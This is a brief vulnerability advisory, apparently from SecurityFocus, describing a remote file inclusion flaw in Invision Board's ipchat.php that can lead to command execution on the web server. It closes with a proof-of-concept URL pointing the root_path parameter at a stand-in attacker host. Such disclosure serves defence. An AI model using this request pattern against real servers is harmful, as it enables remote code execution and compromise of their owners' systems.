11 lines
No EOL
736 B
Text
11 lines
No EOL
736 B
Text
source: https://www.securityfocus.com/bid/6976/info
|
|
|
|
Invision Board is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.
|
|
|
|
This vulnerability is as a result of insufficient sanitization performed on remote user supplied data used in URI parameters of certain PHP pages.
|
|
|
|
Under some circumstances, it may be possible for remote attackers to influence the include path for a global configuration file to point to an external file on a remote server.
|
|
|
|
If the remote file is a malicious file, this vulnerability may be exploited to execute arbitrary system commands in the context of the web server.
|
|
|
|
http://www.example.com/ipchat.php?root_path=http://www.attacker.com/conf_global.php |